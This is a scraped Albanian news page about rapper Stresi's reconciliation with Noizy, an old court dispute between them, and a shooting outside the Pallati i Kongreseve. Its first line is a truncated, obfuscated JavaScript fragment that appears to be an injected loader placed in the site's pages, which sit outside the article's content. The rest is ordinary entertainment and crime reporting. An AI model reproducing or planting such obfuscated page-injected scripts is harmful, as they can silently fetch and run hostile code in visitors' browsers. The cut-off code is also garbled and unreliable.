;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

11 vite pas, Stresi tregon çka i tha Noizy në gjykatë

By

U bënë disa muaj nga kur u kuptua se Stresi dhe Noizy i kanë dhënë fund armiqësive, madje për t’u bërë shokë.

Përgjatë kësaj kohe, lideri i OTR nuk është se ka folur ndonjëherë publikisht sa i përket këtij kapitulli. Por, e njëjta nuk ka ndodhur me Stresin.

Ai disa herë, përfshi edhe në intervista, i ka dhënë përgjigje kurreshtjes së madhe të ndjekësve në rrjete sociale, mbi pajtimin me Noizyn.

Në një video live me Kozak Braçin, Stresi i është rikthyer sërish mbrëmë kësaj pjese.

LAJMI VIJON NËN VIDEO

Ai është shprehur i penduar për fjalët e tij të dikurshme duke thënë se mes tjerash edhe ka qenë i ndikuar nga persona sot me të cilët nuk flet (hmm, rivalë të Noizyt si Geti psh?).

Tutje, reperi ka treguar edhe sa i përket bisedës së tij me Rigelsin afro 10 vite më parë kur sherri i tyre përfundoi në gjykatë.

Bëhet fjalë për ngjarjen në Pallatin e Kongreseve ku do të zhvillohej edicioni i radhës i festivalit “Top-Fest” me pjesëmarrë Noizyn. Ky i fundit ka hyrë në ambientet ku do të zhvillohej festivali, në pritje të debutimit, ndërsa një pjesë e shokëve dhe fansave të tij kanë qënduar jashtë Pallatit të Kongreseve. Në festivalin “Top Fest” do të merrte pjesë dhe grupi me drejtues shtetasin Arkimed Lushaj. Drejt Pallatit të Kongreseve janë drejtuar dhe miqtë e fansat e këtij grupi muzikor, mes tyre EDHE Jetnis Dollapaj, tashmë i ndjerë.

Ky i fundit i ishte afruar Pallatit të Kongreseve me një automjet tip Fuoristradë dhe pasi kishte vënë re prezencën e fansave të grupit muzikor “OTR”, konkretisht shtetasve F.Muça, K. Çela, R. Cerenishti, A.Shkembi, E.Gjici, M.Blazeri, E.Simoni, ka zbritur nga automjeti dhe ka nxjerrë nga një çantë sportive një automatik. Është afruar pranë automjetit tip Benz, ku qëndronin fansat dhe ka qëlluar disa herë me qëllim kanosjen e tyre, në një distancë të afërt prej 10 – 15 m. Nga goditjet nuk ka pasur dëmtime. Më pas, i pandehuri Jetnis Dollapaj është larguar me vrap në drejtim të sheshit “Nënë Tereza”. Gjatë vrapimit i ka rënë arma automatik dhe më pas është kapur nga punonjësit e policisë. /Prive.al

Artikuj të ngjashëm